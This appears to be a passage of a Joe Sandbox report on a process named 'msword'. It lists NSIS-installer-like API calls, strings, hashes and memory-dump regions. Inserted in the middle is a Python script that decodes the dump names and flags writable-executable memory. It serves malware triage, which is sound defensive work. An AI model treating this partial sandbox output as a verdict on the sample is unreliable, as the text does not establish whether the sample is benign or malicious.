                                                                        • API String ID: 3294113728-3145124454
                                                                        • Opcode ID: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                        • Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
                                                                        • Opcode Fuzzy Hash: 7d19fd18931236c609f14dd9ebe02190de13aa3954742adab313f132dac73535
                                                                        • Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98
                                                                        APIs
                                                                        • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
                                                                        • GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
                                                                        • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
                                                                        • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
                                                                        • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040619B
                                                                        • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
                                                                        • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                        • String ID: RMDir: RemoveDirectory invalid input("")
                                                                        • API String ID: 3734993849-2769509956
                                                                        • Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                        • Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
                                                                        • Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
                                                                        • Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD
                                                                        APIs
                                                                        • GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
                                                                        • GetSysColor.USER32(00000000), ref: 00403E00
                                                                        • SetTextColor.GDI32(?,00000000), ref: 00403E0C
                                                                        • SetBkMode.GDI32(?,?), ref: 00403E18
                                                                        • GetSysColor.USER32(?), ref: 00403E2B
                                                                        • SetBkColor.GDI32(?,?), ref: 00403E3B
                                                                        • DeleteObject.GDI32(?), ref: 00403E55
                                                                        • CreateBrushIndirect.GDI32(?), ref: 00403E5F
                                                                        Similarity
                                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                        • String ID:
                                                                        • API String ID: 2320649405-0
                                                                        • Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                        • Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
                                                                        • Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
                                                                        • Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                        • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                        Strings
                                                                        • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                        • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                        • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                        • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
                                                                        • API String ID: 1033533793-945480824
                                                                        • Opcode ID: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                        • Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
                                                                        • Opcode Fuzzy Hash: dad84e194389b7cbeb1d3ab4357ce8e64ef755489eaa46c5795f6130922e59d8
                                                                        • Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D
                                                                        APIs
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
                                                                          • Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
                                                                          • Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB,004034BB,0043B228,?,00000000,00000000), ref: 00404FCD
                                                                          • Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
                                                                          • Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D
                                                                          • Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
                                                                          • Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71
                                                                        • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                        Strings
                                                                        • Exec: success ("%s"), xrefs: 00402263
                                                                        • Exec: command="%s", xrefs: 00402241
                                                                        • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                        • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                        • API String ID: 2014279497-3433828417
                                                                        • Opcode ID: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                        • Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
                                                                        • Opcode Fuzzy Hash: 6d54c557fbd6fdf8dc19518642d08f2325eb4e2a9a3136ddaf8bbf3ddc9e5317
                                                                        • Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D
                                                                        APIs
                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
                                                                        • GetMessagePos.USER32 ref: 00404871
                                                                        • ScreenToClient.USER32(?,?), ref: 00404889
                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Message$Send$ClientScreen
                                                                        • String ID: f
                                                                        • API String ID: 41195575-1993550816
                                                                        • Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                        • Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
                                                                        • Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
                                                                        • Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5
                                                                        APIs
                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                        • MulDiv.KERNEL32(00022000,00000064,?), ref: 00403295
                                                                        • wsprintfW.USER32 ref: 004032A5
                                                                        • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                        Strings
                                                                        • verifying installer: %d%%, xrefs: 0040329F
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                        • String ID: verifying installer: %d%%
                                                                        • API String ID: 1451636040-82062127
                                                                        • Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                        • Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
                                                                        • Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
                                                                        • Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58
                                                                        APIs
                                                                        • lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
                                                                        • wsprintfW.USER32 ref: 00404457
                                                                        • SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                        • String ID: %u.%u%s%s$@rD
                                                                        • API String ID: 3540041739-1813061909
                                                                        • Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                        • Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
                                                                        • Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
                                                                        • Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679
                                                                        APIs
                                                                        • CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
                                                                        • CharNextW.USER32(?,?,?,00000000), ref: 004060AA
                                                                        • CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
                                                                        • CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Char$Next$Prev
                                                                        • String ID: *?|<>/":
                                                                        • API String ID: 589700163-165019052
                                                                        • Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                        • Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
                                                                        • Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
                                                                        • Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD
                                                                        APIs
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                        • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: Close$DeleteEnumOpen
                                                                        • String ID:
                                                                        • API String ID: 1912718029-0
                                                                        • Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                        • Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
                                                                        • Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
                                                                        • Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29
                                                                        APIs
                                                                        • GetDlgItem.USER32(?), ref: 004020A3
                                                                        • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                        • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                        • String ID:
                                                                        • API String ID: 1849352358-0
                                                                        • Opcode ID: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                        • Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
                                                                        • Opcode Fuzzy Hash: 1f7c9829ad23568ddcd68d747fd9c97de9c434eb898eff28d5e97dd8542ad38d
                                                                        • Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28
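The "Memory Dump Source" and "Associated" names repeated in every function entry above carry the process index, snapshot number, region base address and page protection of the dumped region, and the "Snapshot File" name (hcaresult_15_2_400000_msword.jbxd) repeats the process, snapshot and image base. The block below is an added example, not Joe Sandbox code or report output: it parses those names, decodes the protection and region-type values with the standard winnt.h constants, rebuilds the section layout of the 0x400000-based image from the dump names on this page, and flags any writable-and-executable region. The field positions inside the .sdmp name and the hcaresult_<proc>_<snap>_<imagebase>_ layout are assumptions inferred from the names on this page, not a documented format.

```python
"""Decode Joe Sandbox memory-dump names from a function-analysis listing.

Added example, not Joe Sandbox code. ASSUMPTION: the .sdmp name layout
  <proc>.<snapshot>.<dumpid>.<base>.<protect>.<flag>.<type>.<seq>.sdmp
is inferred from the names on this page. PAGE_* / MEM_* values are the
standard winnt.h constants."""
import re
from dataclasses import dataclass

PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

_DUMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<snap>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<flag>[0-9A-Fa-f]{8})\."
    r"(?P<type>[0-9A-Fa-f]{8})\.(?P<seq>[0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    process_index: int   # ASSUMED to match the "15" in hcaresult_15_2_...
    snapshot: int        # ASSUMED to match the "2" in hcaresult_15_2_...
    base: int            # region base address
    protect: int         # PAGE_* protection at dump time
    region_type: int     # MEM_IMAGE / MEM_PRIVATE / MEM_MAPPED

    @property
    def protection(self) -> str:
        return PAGE_PROTECT.get(self.protect, f"0x{self.protect:X}")

    @property
    def executable(self) -> bool:
        return self.protect in (0x10, 0x20, 0x40, 0x80)

    @property
    def writable_executable(self) -> bool:
        # RWX pages are the usual home of unpacked or injected code.
        return self.protect in (0x40, 0x80)


def parse_dump_name(name: str) -> DumpRegion:
    m = _DUMP_RE.match(name.strip())
    if not m:
        raise ValueError(f"not a Joe Sandbox dump name: {name!r}")
    return DumpRegion(
        name=name.strip(),
        process_index=int(m["proc"], 16),
        snapshot=int(m["snap"], 16),
        base=int(m["base"], 16),
        protect=int(m["protect"], 16),
        region_type=int(m["type"], 16),
    )


def matches_snapshot(region: DumpRegion, snapshot_file: str) -> bool:
    """Consistency check against the entry's 'Snapshot File' name.
    ASSUMPTION: hcaresult_<proc>_<snap>_<imagebase>_<name>.jbxd."""
    m = re.match(r"^hcaresult_(\d+)_(\d+)_([0-9A-Fa-f]+)_", snapshot_file)
    if not m:
        return False
    proc, snap, image_base = int(m[1]), int(m[2]), int(m[3], 16)
    return (region.process_index == proc and region.snapshot == snap
            and region.base >= image_base)


def image_layout(names, image_base: int):
    """Sorted (base, protection, type) for MEM_IMAGE regions at/above image_base."""
    regions = [parse_dump_name(n) for n in names]
    same_image = [r for r in regions
                  if r.region_type == 0x1000000 and r.base >= image_base]
    return [(r.base, r.protection, MEM_TYPE[r.region_type])
            for r in sorted(same_image, key=lambda r: r.base)]


def rwx_regions(names):
    return [r.name for r in map(parse_dump_name, names) if r.writable_executable]


# Dump names copied from the 'Memory Dump Source' entries on this page.
PAGE_DUMPS = [
    "0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp",
    "0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp",
    "0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp",
    "0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp",
    "0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp",
    "0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp",
    "0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp",
]

if __name__ == "__main__":
    for base, prot, kind in image_layout(PAGE_DUMPS, 0x400000):
        print(f"{base:#010x}  {prot:<24} {kind}")
    print("RWX regions:", rwx_regions(PAGE_DUMPS) or "none")
```

Run as-is, the layout comes out as a read-only header at 0x400000, an execute-read region at 0x401000 (the code all of the entries above are disassembled from), a read-only region at 0x408000, read-write data at 0x40B000, 0x41F000 and 0x461000, and a read-only region at 0x4F4000; no region on this page is mapped writable and executable, which is what you would expect of a normally loaded image rather than a region a packer has just written and executed.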
                                                                        APIs
                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239872629.00000000004F4000.00000002.00000001.01000000.0000000C.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_15_2_400000_msword.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Timeout
                                                                        • String ID: !
                                                                        • API String ID: 1777923405-2657877971
                                                                        • Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                        • Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
                                                                        • Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
                                                                        • Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758
                                                                        APIs
                                                                          • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                          • Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
                                                                          • Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7
                                                                        Strings
                                                                        • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                        • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                        Memory Dump Source
                                                                        • Source File: 0000000F.00000002.2239667617.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 0000000F.00000002.2239639043.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239712938.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000040B000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.000000000041F000.00000004.00000001.01000000.0000000C.sdmp
                                                                        • Associated: 0000000F.00000002.2239754865.0000000000461000.00000004.00000001.01000000.0000000C.sdmp
